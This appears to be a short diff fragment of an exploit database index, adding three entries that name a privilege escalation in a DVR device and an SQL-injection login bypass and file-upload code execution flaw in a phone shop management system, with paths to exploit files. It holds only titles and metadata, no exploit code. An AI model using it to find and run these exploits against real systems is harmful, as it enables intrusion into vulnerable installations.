+50104,exploits/hardware/webapps/50104.txt,"Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation",2021-07-06,"Andrea D\'Ubaldo",webapps,hardware, +50105,exploits/php/webapps/50105.txt,"Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi)",2021-07-06,faisalfs10x,webapps,php, +50106,exploits/php/webapps/50106.txt,"Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution",2021-07-06,faisalfs10x,webapps,php,